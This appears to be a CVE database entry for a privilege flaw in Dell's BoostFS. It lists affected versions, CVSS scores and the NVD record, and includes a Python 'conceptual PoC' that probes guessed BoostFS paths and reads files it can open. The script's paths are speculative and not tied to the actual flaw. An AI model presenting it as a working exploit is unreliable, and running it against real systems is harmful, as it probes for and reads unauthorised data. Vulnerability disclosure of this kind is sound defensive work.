Security Vulnerability Report
CVE-2025-43914 CVSS 7.5 HIGH

CVE-2025-43914

Published: 2025-10-07 18:16:00
Last Modified: 2026-02-12 17:14:06

Description

Dell PowerProtect Data Domain BoostFS for Linux Ubuntu systems of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Unauthorized access.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain BoostFS Feature Release 7.7.1.0 - 8.3.0.15
Dell PowerProtect Data Domain BoostFS LTS2025 8.3.1.0
Dell PowerProtect Data Domain BoostFS LTS2024 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain BoostFS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43914 - Dell PowerProtect Data Domain BoostFS Privilege Assignment Vulnerability PoC
# This is a conceptual PoC demonstrating the privilege assignment issue

import os
import subprocess
import sys


def check_boostfs_mount():
    """Check if BoostFS is mounted on the system"""
    try:
        result = subprocess.run(['mount'], capture_output=True, text=True)
        if 'boostfs' in result.stdout.lower() or 'ddboost' in result.stdout.lower():
            return True
        return False
    except Exception as e:
        print(f"Error checking mount: {e}")
        return False


def check_current_user():
    """Check current user privileges"""
    uid = os.getuid()
    username = subprocess.run(['whoami'], capture_output=True, text=True).stdout.strip()
    return uid, username


def test_privilege_escalation(mount_point):
    """
    Test for privilege escalation via BoostFS
    Low-privileged users should not be able to access certain restricted resources
    """
    uid, username = check_current_user()
    print(f"[*] Current user: {username} (UID: {uid})")

    if uid == 0:
        print("[!] Running as root, vulnerability test not applicable")
        return

    # Attempt to access restricted BoostFS resources
    restricted_paths = [
        f"{mount_point}/admin",
        f"{mount_point}/config",
        f"{mount_point}/system",
        f"{mount_point}/.restricted",
        f"{mount_point}/backup/system"
    ]

    for path in restricted_paths:
        if os.path.exists(path):
            try:
                # Attempt read access to restricted resources
                files = os.listdir(path)
                print(f"[VULNERABLE] Unauthorized access to: {path}")
                print(f"    Contents: {files[:5]}")

                # Attempt to read sensitive files
                for item in files[:3]:
                    item_path = os.path.join(path, item)
                    if os.path.isfile(item_path):
                        with open(item_path, 'r') as f:
                            content = f.read(100)
                            print(f"    Read from {item}: {content[:50]}...")
            except PermissionError:
                print(f"[SAFE] Access denied to: {path}")
            except Exception as e:
                print(f"[ERROR] {path}: {e}")


def main():
    print("=" * 60)
    print("CVE-2025-43914 PoC - BoostFS Privilege Assignment Check")
    print("=" * 60)

    if not check_boostfs_mount():
        print("[!] BoostFS not detected on this system")
        sys.exit(1)

    # Common BoostFS mount points
    mount_points = ['/mnt/boostfs', '/boostfs', '/mnt/ddboost', '/ddboost']

    for mp in mount_points:
        if os.path.exists(mp):
            print(f"\n[*] Checking mount point: {mp}")
            test_privilege_escalation(mp)

    print("\n[*] Test completed")


if __name__ == "__main__":
    main()

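References

https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory)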

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43914", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:16:00.000", "lastModified": "2026-02-12T17:14:05.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain BoostFS for Linux Ubuntu systems of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndIncluding": "7.13.1.40", "matchCriteriaId": "B451DCE2-896E-4DFC-AA2B-CA1B0C257BAD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "303AC151-B605-4F51-B001-197787B6B54E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}